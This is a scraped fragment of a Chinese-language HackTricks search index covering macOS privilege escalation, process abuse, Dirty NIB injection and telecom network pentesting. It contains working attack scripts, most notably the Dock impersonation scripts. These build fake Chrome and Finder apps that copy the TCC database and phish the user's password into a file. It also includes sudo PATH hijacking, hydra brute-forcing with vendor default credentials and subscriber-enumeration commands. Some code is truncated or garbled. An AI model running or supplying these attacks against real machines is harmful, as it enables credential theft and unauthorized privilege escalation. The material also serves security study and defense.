支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 
通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Objective-C » 文件","id":"2317","title":"文件"},"2318":{"body":"Reading time: 9 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Privilege Escalation » macOS 提权","id":"2318","title":"macOS 提权"},"2319":{"body":"如果你来这里寻找 TCC 提权,请访问: macOS TCC","breadcrumbs":"macOS Security & Privilege Escalation » macOS Privilege Escalation » TCC 提权","id":"2319","title":"TCC 提权"},"232":{"body":"大量厂商的网络设备出厂时包含硬编码的 SSH/Telnet 用户,例如 root:admin, dbadmin:dbadmin, cacti:cacti, ftpuser:ftpuser, …。专门的 wordlist 会显著提升 brute-force 成功率: bash hydra -L usernames.txt -P vendor_telecom_defaults.txt ssh://10.10.10.10 -t 8 -o found.txt 如果设备仅暴露管理 VRF,请先通过 jump host 进行 pivot(参见下面的 «SGSN Emu Tunnel» 部分)。","breadcrumbs":"Pentesting Network » Telecom Network Exploitation » 1.1 默认 OSS / NE 帐户","id":"232","title":"1.1 默认 OSS / NE 帐户"},"2320":{"body":"请注意, 大多数影响 Linux/Unix 的提权技巧也会影响 MacOS 机器。因此请查看: Linux Privilege Escalation","breadcrumbs":"macOS Security & Privilege Escalation » macOS Privilege Escalation » Linux 提权","id":"2320","title":"Linux 提权"},"2321":{"body":"","breadcrumbs":"macOS Security & Privilege Escalation » macOS Privilege Escalation » 用户交互","id":"2321","title":"用户交互"},"2322":{"body":"你可以在 Linux 提权文章中找到原始的 Sudo 劫持技巧 。 然而,macOS 保持 用户的 PATH 当他执行 sudo 时。这意味着实现此攻击的另一种方法是 劫持其他二进制文件 ,这些文件是受害者在 运行 sudo 时仍会执行的: bash # Let\'s hijack ls in /opt/homebrew/bin, as this is usually already in the users PATH\\ncat > /opt/homebrew/bin/ls < /tmp/privesc\\nfi\\n/bin/ls \\"\\\\$@\\"\\nEOF\\nchmod +x /opt/homebrew/bin/ls # victim\\nsudo ls 
注意,使用终端的用户很可能已经 安装了 Homebrew 。因此,可以劫持**/opt/homebrew/bin**中的二进制文件。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Privilege Escalation » Sudo 劫持","id":"2322","title":"Sudo 劫持"},"2323":{"body":"通过一些 社会工程 ,你可以在 Dock 中 冒充例如 Google Chrome ,并实际执行你自己的脚本: Chrome Impersonation\\nFinder Impersonation 一些建议: 在 Dock 中检查是否有 Chrome,如果有, 删除 该条目,并在 Dock 数组的相同位置 添加****假冒 的 Chrome条目 。 bash #!/bin/sh # THIS REQUIRES GOOGLE CHROME TO BE INSTALLED (TO COPY THE ICON)\\n# If you want to removed granted TCC permissions: > delete from access where client LIKE \'%Chrome%\'; rm -rf /tmp/Google\\\\ Chrome.app/ 2>/dev/null # Create App structure\\nmkdir -p /tmp/Google\\\\ Chrome.app/Contents/MacOS\\nmkdir -p /tmp/Google\\\\ Chrome.app/Contents/Resources # Payload to execute\\ncat > /tmp/Google\\\\ Chrome.app/Contents/MacOS/Google\\\\ Chrome.c <\\n#include \\n#include int main() {\\nchar *cmd = \\"open /Applications/Google\\\\\\\\\\\\\\\\ Chrome.app & \\"\\n\\"sleep 2; \\"\\n\\"osascript -e \'tell application \\\\\\"Finder\\\\\\"\' -e \'set homeFolder to path to home folder as string\' -e \'set sourceFile to POSIX file \\\\\\"/Library/Application Support/com.apple.TCC/TCC.db\\\\\\" as alias\' -e \'set targetFolder to POSIX file \\\\\\"/tmp\\\\\\" as alias\' -e \'duplicate file sourceFile to targetFolder with replacing\' -e \'end tell\'; \\"\\n\\"PASSWORD=\\\\$(osascript -e \'Tell application \\\\\\"Finder\\\\\\"\' -e \'Activate\' -e \'set userPassword to text returned of (display dialog \\\\\\"Enter your password to update Google Chrome:\\\\\\" default answer \\\\\\"\\\\\\" with hidden answer buttons {\\\\\\"OK\\\\\\"} default button 1 with icon file \\\\\\"Applications:Google Chrome.app:Contents:Resources:app.icns\\\\\\")\' -e \'end tell\' -e \'return userPassword\'); \\"\\n\\"echo \\\\$PASSWORD > /tmp/passwd.txt\\";\\nsystem(cmd);\\nreturn 0;\\n}\\nEOF gcc /tmp/Google\\\\ Chrome.app/Contents/MacOS/Google\\\\ Chrome.c -o /tmp/Google\\\\ Chrome.app/Contents/MacOS/Google\\\\ 
Chrome\\nrm -rf /tmp/Google\\\\ Chrome.app/Contents/MacOS/Google\\\\ Chrome.c chmod +x /tmp/Google\\\\ Chrome.app/Contents/MacOS/Google\\\\ Chrome # Info.plist\\ncat << EOF > /tmp/Google\\\\ Chrome.app/Contents/Info.plist\\n\\n\\n\\n\\nCFBundleExecutable\\nGoogle Chrome\\nCFBundleIdentifier\\ncom.google.Chrome\\nCFBundleName\\nGoogle Chrome\\nCFBundleVersion\\n1.0\\nCFBundleShortVersionString\\n1.0\\nCFBundleInfoDictionaryVersion\\n6.0\\nCFBundlePackageType\\nAPPL\\nCFBundleIconFile\\napp\\n\\n\\nEOF # Copy icon from Google Chrome\\ncp /Applications/Google\\\\ Chrome.app/Contents/Resources/app.icns /tmp/Google\\\\ Chrome.app/Contents/Resources/app.icns # Add to Dock\\ndefaults write com.apple.dock persistent-apps -array-add \'tile-datafile-data_CFURLString/tmp/Google Chrome.app_CFURLStringType0\'\\nsleep 0.1\\nkillall Dock 一些建议: 你 无法从 Dock 中移除 Finder ,所以如果你要将其添加到 Dock 中,可以将假 Finder 放在真实 Finder 旁边。为此,你需要 将假 Finder 条目添加到 Dock 数组的开头 。 另一个选项是不要将其放在 Dock 中,只需打开它,“Finder 请求控制 Finder”并不奇怪。 另一个选项是 在不询问 密码的情况下提升到 root 权限,使用一个可怕的框,实际上让 Finder 请求密码以执行特权操作: 请求 Finder 将一个新的 sudo 文件复制到 /etc/pam.d (提示请求密码将指示“Finder 想要复制 sudo”) 请求 Finder 复制一个新的 Authorization Plugin (你可以控制文件名,以便提示请求密码将指示“Finder 想要复制 Finder.bundle”) bash #!/bin/sh # THIS REQUIRES Finder TO BE INSTALLED (TO COPY THE ICON)\\n# If you want to removed granted TCC permissions: > delete from access where client LIKE \'%finder%\'; rm -rf /tmp/Finder.app/ 2>/dev/null # Create App structure\\nmkdir -p /tmp/Finder.app/Contents/MacOS\\nmkdir -p /tmp/Finder.app/Contents/Resources # Payload to execute\\ncat > /tmp/Finder.app/Contents/MacOS/Finder.c <\\n#include \\n#include int main() {\\nchar *cmd = \\"open /System/Library/CoreServices/Finder.app & \\"\\n\\"sleep 2; \\"\\n\\"osascript -e \'tell application \\\\\\"Finder\\\\\\"\' -e \'set homeFolder to path to home folder as string\' -e \'set sourceFile to POSIX file \\\\\\"/Library/Application Support/com.apple.TCC/TCC.db\\\\\\" as alias\' -e \'set targetFolder to POSIX file 
\\\\\\"/tmp\\\\\\" as alias\' -e \'duplicate file sourceFile to targetFolder with replacing\' -e \'end tell\'; \\"\\n\\"PASSWORD=\\\\$(osascript -e \'Tell application \\\\\\"Finder\\\\\\"\' -e \'Activate\' -e \'set userPassword to text returned of (display dialog \\\\\\"Finder needs to update some components. Enter your password:\\\\\\" default answer \\\\\\"\\\\\\" with hidden answer buttons {\\\\\\"OK\\\\\\"} default button 1 with icon file \\\\\\"System:Library:CoreServices:Finder.app:Contents:Resources:Finder.icns\\\\\\")\' -e \'end tell\' -e \'return userPassword\'); \\"\\n\\"echo \\\\$PASSWORD > /tmp/passwd.txt\\";\\nsystem(cmd);\\nreturn 0;\\n}\\nEOF gcc /tmp/Finder.app/Contents/MacOS/Finder.c -o /tmp/Finder.app/Contents/MacOS/Finder\\nrm -rf /tmp/Finder.app/Contents/MacOS/Finder.c chmod +x /tmp/Finder.app/Contents/MacOS/Finder # Info.plist\\ncat << EOF > /tmp/Finder.app/Contents/Info.plist\\n\\n\\n\\n\\nCFBundleExecutable\\nFinder\\nCFBundleIdentifier\\ncom.apple.finder\\nCFBundleName\\nFinder\\nCFBundleVersion\\n1.0\\nCFBundleShortVersionString\\n1.0\\nCFBundleInfoDictionaryVersion\\n6.0\\nCFBundlePackageType\\nAPPL\\nCFBundleIconFile\\napp\\n\\n\\nEOF # Copy icon from Finder\\ncp /System/Library/CoreServices/Finder.app/Contents/Resources/Finder.icns /tmp/Finder.app/Contents/Resources/app.icns # Add to Dock\\ndefaults write com.apple.dock persistent-apps -array-add \'tile-datafile-data_CFURLString/tmp/Finder.app_CFURLStringType0\'\\nsleep 0.1\\nkillall Dock","breadcrumbs":"macOS Security & Privilege Escalation » macOS Privilege Escalation » Dock 冒充","id":"2323","title":"Dock 冒充"},"2324":{"body":"","breadcrumbs":"macOS Security & Privilege Escalation » macOS Privilege Escalation » TCC - Root 权限提升","id":"2324","title":"TCC - Root 权限提升"},"2325":{"body":"任何用户 (甚至是无特权用户)都可以创建并挂载时间机器快照,并 访问该快照的所有文件 。 所需的 唯一特权 是用于访问的应用程序(如 Terminal)必须具有 完全磁盘访问 (FDA)权限(kTCCServiceSystemPolicyAllfiles),该权限需要由管理员授予。 bash # Create snapshot\\ntmutil localsnapshot # List 
snapshots\\ntmutil listlocalsnapshots /\\nSnapshots for disk /:\\ncom.apple.TimeMachine.2023-05-29-001751.local # Generate folder to mount it\\ncd /tmp # I didn it from this folder\\nmkdir /tmp/snap # Mount it, \\"noowners\\" will mount the folder so the current user can access everything\\n/sbin/mount_apfs -o noowners -s com.apple.TimeMachine.2023-05-29-001751.local /System/Volumes/Data /tmp/snap # Access it\\nls /tmp/snap/Users/admin_user # This will work 更详细的解释可以在 原始报告中找到 。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Privilege Escalation » CVE-2020-9771 - mount_apfs TCC 绕过和权限提升","id":"2325","title":"CVE-2020-9771 - mount_apfs TCC 绕过和权限提升"},"2326":{"body":"这可以用于提升权限: macOS Sensitive Locations & Interesting Daemons tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Privilege Escalation » 敏感信息","id":"2326","title":"敏感信息"},"2327":{"body":"Reading time: 21 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS 进程滥用","id":"2327","title":"macOS 进程滥用"},"2328":{"body":"进程是正在运行的可执行文件的实例,但进程并不运行代码,这些是线程。因此, 进程只是运行线程的容器 ,提供内存、描述符、端口、权限等... 
传统上,进程是在其他进程中启动的(除了 PID 1),通过调用 fork 创建当前进程的精确副本,然后 子进程 通常会调用 execve 来加载新的可执行文件并运行它。随后,引入了 vfork 以加快此过程而无需任何内存复制。 然后引入了 posix_spawn ,将 vfork 和 execve 结合在一个调用中,并接受标志: POSIX_SPAWN_RESETIDS: 将有效 ID 重置为真实 ID POSIX_SPAWN_SETPGROUP: 设置进程组归属 POSUX_SPAWN_SETSIGDEF: 设置信号默认行为 POSIX_SPAWN_SETSIGMASK: 设置信号掩码 POSIX_SPAWN_SETEXEC: 在同一进程中执行(类似于 execve,但有更多选项) POSIX_SPAWN_START_SUSPENDED: 启动时挂起 _POSIX_SPAWN_DISABLE_ASLR: 无 ASLR 启动 _POSIX_SPAWN_NANO_ALLOCATOR: 使用 libmalloc 的 Nano 分配器 _POSIX_SPAWN_ALLOW_DATA_EXEC: 允许数据段上的 rwx POSIX_SPAWN_CLOEXEC_DEFAULT: 默认情况下在 exec(2) 时关闭所有文件描述符 _POSIX_SPAWN_HIGH_BITS_ASLR: 随机化 ASLR 滑动的高位 此外,posix_spawn 允许指定一个 posix_spawnattr 数组,以控制生成进程的某些方面,以及 posix_spawn_file_actions 来修改描述符的状态。 当进程终止时,它会向 父进程发送返回代码 (如果父进程已终止,则新父进程为 PID 1),并发送信号 SIGCHLD。父进程需要通过调用 wait4() 或 waitid() 来获取此值,直到那时,子进程保持在僵尸状态,仍然被列出但不消耗资源。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » 进程基本信息","id":"2328","title":"进程基本信息"},"2329":{"body":"PID,进程标识符,标识一个唯一的进程。在 XNU 中, PIDs 是 64 位 ,单调递增且 永不回绕 (以避免滥用)。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » PIDs","id":"2329","title":"PIDs"},"233":{"body":"大多数 GRX 运营商仍然允许在骨干网络上使用 ICMP echo 。将 masscan 与内置的 gtpv1 UDP 探针结合使用,以快速映射 GTP-C 侦听器: bash masscan 10.0.0.0/8 -pU:2123 --rate 50000 --router-ip 10.0.0.254 --router-mac 00:11:22:33:44:55","breadcrumbs":"Pentesting Network » Telecom Network Exploitation » 1.2 GRX/IPX 内的主机发现","id":"233","title":"1.2 GRX/IPX 内的主机发现"},"2330":{"body":"进程 可以被插入到 组 中,以便更容易处理。例如,shell 脚本中的命令将处于同一进程组中,因此可以使用 kill 等方式 一起发送信号 。 也可以 将进程分组到会话中 。当进程启动会话(setsid(2))时,子进程被设置在会话内,除非它们启动自己的会话。 联盟是 Darwin 中另一种分组进程的方式。加入联盟的进程可以访问池资源,共享账本或面对 Jetsam。联盟有不同的角色:领导者、XPC 服务、扩展。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » 进程组、会话与联盟","id":"2330","title":"进程组、会话与联盟"},"2331":{"body":"每个进程持有 凭证 ,以 识别其在系统中的权限 。每个进程将有一个主要的 uid 和一个主要的 gid(尽管可能属于多个组)。 如果二进制文件具有 setuid/setgid 位,也可以更改用户和组 ID。 有几个函数可以 设置新的 uids/gids 。 系统调用 persona 提供了一组 替代 的 凭证 。采用一个角色会同时假定其 
uid、gid 和组成员资格。在 源代码 中可以找到该结构: c struct kpersona_info { uint32_t persona_info_version;\\nuid_t persona_id; /* overlaps with UID */\\nint persona_type;\\ngid_t persona_gid;\\nuint32_t persona_ngroups;\\ngid_t persona_groups[NGROUPS];\\nuid_t persona_gmuid;\\nchar persona_name[MAXLOGNAME + 1]; /* TODO: MAC policies?! */\\n}","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » 凭证与角色","id":"2331","title":"凭证与角色"},"2332":{"body":"POSIX 线程 (pthreads): macOS 支持 POSIX 线程 (pthreads),这是 C/C++ 的标准线程 API 的一部分。macOS 中 pthreads 的实现位于 /usr/lib/system/libsystem_pthread.dylib,该库来自公开可用的 libpthread 项目。此库提供创建和管理线程所需的函数。 创建线程: pthread_create() 函数用于创建新线程。在内部,此函数调用 bsdthread_create(),这是一个特定于 XNU 内核的低级系统调用(macOS 基于的内核)。此系统调用接受来自 pthread_attr(属性)的各种标志,这些标志指定线程行为,包括调度策略和堆栈大小。 默认堆栈大小: 新线程的默认堆栈大小为 512 KB,足以满足典型操作,但如果需要更多或更少的空间,可以通过线程属性进行调整。 线程初始化: __pthread_init() 函数在线程设置过程中至关重要,利用 env[] 参数解析环境变量,这些变量可以包含有关堆栈位置和大小的详细信息。 macOS 中的线程终止 退出线程: 线程通常通过调用 pthread_exit() 来终止。此函数允许线程干净地退出,执行必要的清理,并允许线程将返回值发送回任何加入者。 线程清理: 调用 pthread_exit() 后,将调用 pthread_terminate() 函数,该函数处理所有相关线程结构的移除。它会释放 Mach 线程端口(Mach 是 XNU 内核中的通信子系统),并调用 bsdthread_terminate,这是一个移除与线程相关的内核级结构的系统调用。 同步机制 为了管理对共享资源的访问并避免竞争条件,macOS 提供了几种同步原语。这些在多线程环境中至关重要,以确保数据完整性和系统稳定性: 互斥锁: 常规互斥锁 (签名: 0x4D555458): 标准互斥锁,内存占用为 60 字节(互斥锁 56 字节,签名 4 字节)。 快速互斥锁 (签名: 0x4d55545A): 类似于常规互斥锁,但针对更快的操作进行了优化,大小也为 60 字节。 条件变量: 用于等待某些条件的发生,大小为 44 字节(40 字节加 4 字节签名)。 条件变量属性 (签名: 0x434e4441): 条件变量的配置属性,大小为 12 字节。 一次变量 (签名: 0x4f4e4345): 确保一段初始化代码仅执行一次。其大小为 12 字节。 读写锁: 允许多个读者或一个写者同时访问,促进对共享数据的高效访问。 读写锁 (签名: 0x52574c4b): 大小为 196 字节。 读写锁属性 (签名: 0x52574c41): 读写锁的属性,大小为 20 字节。 tip 这些对象的最后 4 字节用于检测溢出。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » 线程基本信息","id":"2332","title":"线程基本信息"},"2333":{"body":"线程局部变量 (TLV) 在 Mach-O 文件(macOS 中可执行文件的格式)的上下文中用于声明特定于 每个线程 的变量,以便在多线程应用程序中使用。这确保每个线程都有自己单独的变量实例,从而提供了一种避免冲突和维护数据完整性的方法,而无需像互斥锁那样的显式同步机制。 在 C 及相关语言中,可以使用 __thread 关键字声明线程局部变量。以下是您示例中的工作原理: c cCopy code__thread int tlv_var; 
void main (int argc, char **argv){\\ntlv_var = 10;\\n} 这个片段将 tlv_var 定义为线程局部变量。每个运行此代码的线程将拥有自己的 tlv_var,一个线程对 tlv_var 的更改不会影响另一个线程中的 tlv_var。 在 Mach-O 二进制文件中,与线程局部变量相关的数据被组织成特定的部分: __DATA.__thread_vars : 此部分包含有关线程局部变量的元数据,如它们的类型和初始化状态。 __DATA.__thread_bss : 此部分用于未显式初始化的线程局部变量。它是为零初始化数据保留的内存的一部分。 Mach-O 还提供了一个特定的 API,称为 tlv_atexit ,用于管理线程退出时的线程局部变量。此 API 允许您 注册析构函数 ——在线程终止时清理线程局部数据的特殊函数。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » 线程局部变量 (TLV)","id":"2333","title":"线程局部变量 (TLV)"},"2334":{"body":"理解线程优先级涉及查看操作系统如何决定哪些线程运行以及何时运行。这个决定受到分配给每个线程的优先级级别的影响。在 macOS 和类 Unix 系统中,这通过 nice、renice 和服务质量 (QoS) 类等概念来处理。 Nice 和 Renice Nice: 进程的 nice 值是一个影响其优先级的数字。每个进程的 nice 值范围从 -20(最高优先级)到 19(最低优先级)。进程创建时的默认 nice 值通常为 0。 较低的 nice 值(接近 -20)使进程更“自私”,相对于其他具有较高 nice 值的进程,给予其更多的 CPU 时间。 Renice: renice 是一个用于更改已运行进程的 nice 值的命令。这可以用于动态调整进程的优先级,基于新的 nice 值增加或减少其 CPU 时间分配。 例如,如果一个进程暂时需要更多的 CPU 资源,您可能会使用 renice 降低其 nice 值。 服务质量 (QoS) 类 QoS 类是处理线程优先级的更现代的方法,特别是在支持 Grand Central Dispatch (GCD) 的系统中。QoS 类允许开发人员根据任务的重要性或紧急性将工作 分类 为不同级别。macOS 根据这些 QoS 类自动管理线程优先级: 用户交互: 此类用于当前与用户交互或需要立即结果以提供良好用户体验的任务。这些任务被赋予最高优先级,以保持界面的响应性(例如,动画或事件处理)。 用户启动: 用户启动并期望立即结果的任务,例如打开文档或单击需要计算的按钮。这些任务优先级高,但低于用户交互。 实用程序: 这些任务是长时间运行的,通常显示进度指示器(例如,下载文件、导入数据)。它们的优先级低于用户启动的任务,不需要立即完成。 后台: 此类用于在后台运行且对用户不可见的任务。这些可以是索引、同步或备份等任务。它们的优先级最低,对系统性能的影响最小。 使用 QoS 类,开发人员不需要管理确切的优先级数字,而是专注于任务的性质,系统会相应地优化 CPU 资源。 此外,还有不同的 线程调度策略 ,用于指定调度程序将考虑的一组调度参数。这可以通过 thread_policy_[set/get] 来完成。这在竞争条件攻击中可能会很有用。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » 线程优先级","id":"2334","title":"线程优先级"},"2335":{"body":"MacOS 像其他操作系统一样,提供多种方法和机制供 进程交互、通信和共享数据 。虽然这些技术对于高效的系统功能至关重要,但也可能被威胁行为者滥用以 执行恶意活动 。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » MacOS 进程滥用","id":"2335","title":"MacOS 进程滥用"},"2336":{"body":"库注入是一种技术,攻击者 强制进程加载恶意库 。一旦注入,库将在目标进程的上下文中运行,攻击者将获得与该进程相同的权限和访问权限。 macOS Library Injection","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process 
Abuse » 库注入","id":"2336","title":"库注入"},"2337":{"body":"函数钩子涉及 拦截软件代码中的函数调用 或消息。通过钩住函数,攻击者可以 修改进程的行为 、观察敏感数据,甚至控制执行流程。 macOS Function Hooking","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » 函数钩子","id":"2337","title":"函数钩子"},"2338":{"body":"进程间通信 (IPC) 指的是不同进程 共享和交换数据 的不同方法。虽然 IPC 对许多合法应用程序至关重要,但也可能被滥用以破坏进程隔离、泄露敏感信息或执行未经授权的操作。 macOS IPC - Inter Process Communication","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » 进程间通信","id":"2338","title":"进程间通信"},"2339":{"body":"使用特定环境变量执行的 Electron 应用程序可能会受到进程注入的影响: macOS Electron Applications Injection","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » Electron 应用程序注入","id":"2339","title":"Electron 应用程序注入"},"234":{"body":"下面的 Go 工具构造 GTP-C Create PDP Context Request 数据包并记录响应。每个回复会显示当前为所查询的 IMSI 提供服务的 SGSN / MME ,有时还会显示该订户访问的 PLMN。 bash # Build\\nGOOS=linux GOARCH=amd64 go build -o cordscan ./cmd/cordscan # Usage (typical):\\n./cordscan --imsi 404995112345678 --oper 40499 -w out.pcap 主要标志: --imsi 目标订户 IMSI --oper 归属网络 / HNI (MCC+MNC) -w 将原始数据包写入 pcap 二进制文件中的重要常量可以被修改以扩大扫描范围: pingtimeout = 3 // seconds before giving up\\npco = 0x218080\\ncommon_tcp_ports = \\"22,23,80,443,8080\\"","breadcrumbs":"Pentesting Network » Telecom Network Exploitation » 2. 枚举订户 – cordscan","id":"234","title":"2. 
枚举订户 – cordscan"},"2340":{"body":"可以使用 --load-extension 和 --use-fake-ui-for-media-stream 标志执行 浏览器中的人攻击 ,从而窃取击键、流量、cookie,在页面中注入脚本...: macOS Chromium Injection","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » Chromium 注入","id":"2340","title":"Chromium 注入"},"2341":{"body":"NIB 文件 定义用户界面 (UI) 元素 及其在应用程序中的交互。然而,它们可以 执行任意命令 ,而且 Gatekeeper 不会阻止 已执行的应用程序在 NIB 文件被修改 后再次执行。因此,它们可以用于使任意程序执行任意命令: macOS Dirty NIB","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » 脏 NIB","id":"2341","title":"脏 NIB"},"2342":{"body":"可以滥用某些 Java 功能(如 _JAVA_OPTS 环境变量)使 Java 应用程序执行 任意代码/命令 。 macOS Java Applications Injection","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » Java 应用程序注入","id":"2342","title":"Java 应用程序注入"},"2343":{"body":"可以通过 滥用 .Net 调试功能 (未受 macOS 保护,如运行时强化)向 .Net 应用程序注入代码。 macOS .Net Applications Injection","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » .Net 应用程序注入","id":"2343","title":".Net 应用程序注入"},"2344":{"body":"检查不同选项以使 Perl 脚本执行任意代码: macOS Perl Applications Injection","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » Perl 注入","id":"2344","title":"Perl 注入"},"2345":{"body":"也可以滥用 Ruby 环境变量使任意脚本执行任意代码: macOS Ruby Applications Injection","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » Ruby 注入","id":"2345","title":"Ruby 注入"},"2346":{"body":"如果环境变量 PYTHONINSPECT 被设置,Python 进程将在完成后进入 Python CLI。也可以使用 PYTHONSTARTUP 指定在交互会话开始时执行的 Python 脚本。 但是,请注意,当 PYTHONINSPECT 创建交互会话时, PYTHONSTARTUP 脚本不会被执行。 其他环境变量如 PYTHONPATH 和 PYTHONHOME 也可能对执行任意代码的 Python 命令有用。 请注意,使用 pyinstaller 编译的可执行文件即使在使用嵌入式 Python 运行时也不会使用这些环境变量。 caution 总的来说,我找不到通过滥用环境变量使 Python 执行任意代码的方法。 然而,大多数人使用 Homebrew 安装 Python,这将在 可写位置 为默认管理员用户安装 Python。您可以用以下方法劫持它: mv /opt/homebrew/bin/python3 /opt/homebrew/bin/python3.old\\ncat > /opt/homebrew/bin/python3 <\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n 这会在 nib 加载时在目标进程中实现任意 AppleScript 执行。 
高级链可以: 实例化任意 AppKit 类(例如 NSTask)并调用像 -launch 这样的无参方法。 通过上面的 binding 技巧使用对象参数调用任意 selector。 加载 AppleScriptObjC.framework 以桥接到 Objective‑C,甚至调用特定的 C API。 在仍包含 Python.framework 的旧系统上,可以桥接到 Python,然后使用 ctypes 调用任意 C 函数(Sector7 的研究)。 替换应用的 nib 将 target.app 复制到可写位置,替换例如 Contents/Resources/MainMenu.nib 为恶意 nib,然后运行 target.app。Pre‑Ventura 下,在一次 Gatekeeper 评估之后,后续启动仅执行浅层签名检查,因此非可执行资源(例如 .nib)不会被重新验证。 Example AppleScript payload for a visible test: applescript set theDialogText to \\"PWND\\"\\ndisplay dialog theDialogText","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS Dirty NIB » Dirty NIB injection process (attacker view)","id":"2353","title":"Dirty NIB injection process (attacker view)"},"2354":{"body":"Apple 引入了若干系统性缓解措施,大幅降低了 Dirty NIB 在现代 macOS 上的可行性: 首次启动的深度验证与 bundle 保护 (macOS 13 Ventura) 在任何应用的首次运行时(无论是否被 quarantine),系统会对所有 bundle 资源进行深度签名校验。此后,bundle 会受到保护:只有来自相同开发者(或被应用明确允许)的应用可以修改其内容。其他应用要想写入另一个应用的 bundle,需要新的 TCC “App Management” 权限。 Launch Constraints (macOS 13 Ventura) 系统/Apple 捆绑的应用无法被复制到其他位置并被启动;这封堵了对系统应用使用 “复制到 /tmp、修改、运行” 的方法。 macOS 14 Sonoma 的改进 Apple 强化了 App Management 并修补了已知的绕过(例如由 Sector7 报告的 CVE‑2023‑40450)。Python.framework 在更早的版本被移除(macOS 12.3),这中断了某些提权链。 Gatekeeper/Quarantine 变更 关于 Gatekeeper、provenance 和 assessment 的更广泛讨论以及这些变化如何影响该技术,请参见下方引用的页面。 Practical implication • 在 Ventura 及更高版本中,除非你的进程拥有 App Management 或与目标使用相同 Team ID(例如开发工具),否则通常无法修改第三方应用的 .nib。 • 给 shell/terminal 授予 App Management 或 Full Disk Access 实际上会重新打开这一攻击面,允许任何能在该终端上下文中执行代码的实体利用它。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS Dirty NIB » Modern macOS protections (Ventura/Monterey/Sonoma/Sequoia)","id":"2354","title":"Modern macOS protections (Ventura/Monterey/Sonoma/Sequoia)"},"2355":{"body":"Launch Constraints 从 Ventura 开始阻止从非默认位置运行许多 Apple 应用。如果你此前依赖于 pre‑Ventura 的工作流(例如将 Apple 应用复制到临时目录、修改 MainMenu.nib 然后启动),在 >= 13.0 上预计会失败。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » 
macOS Dirty NIB » Addressing Launch Constraints","id":"2355","title":"Addressing Launch Constraints"},"2356":{"body":"Locate apps whose UI is nib‑driven: bash find /Applications -maxdepth 2 -name Info.plist -exec sh -c \\\\\\n\'for p; do if /usr/libexec/PlistBuddy -c \\"Print :NSMainNibFile\\" \\"$p\\" >/dev/null 2>&1; \\\\\\nthen echo \\"[+] $(dirname \\"$p\\") uses NSMainNibFile=$( /usr/libexec/PlistBuddy -c \\"Print :NSMainNibFile\\" \\"$p\\" )\\"; fi; done\' sh {} + 在 bundle 中查找候选的 nib 资源: bash find target.app -type f \\\\( -name \\"*.nib\\" -o -name \\"*.xib\\" \\\\) -print 深入验证 code signatures (如果你篡改了资源且没有 re‑sign,会失败): bash codesign --verify --deep --strict --verbose=4 target.app 注意:在现代 macOS 上,尝试在未获得适当授权的情况下写入另一个应用的 bundle,会被 bundle protection/TCC 阻止。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Process Abuse » macOS Dirty NIB » Enumerating targets and nibs (useful for research / legacy systems)","id":"2356","title":"Enumerating targets and nibs (useful for research / legacy systems)"},"2357":{"body":"对 bundle 资源进行文件完整性监控 监控已安装应用中 Contents/Resources/*.nib 及其他非可执行资源的 mtime/ctime 更改。 统一日志与进程行为 监控 GUI 应用中意外的 AppleScript 执行,以及加载 AppleScriptObjC 或 Python.framework 的进程。示例: bash log stream --info 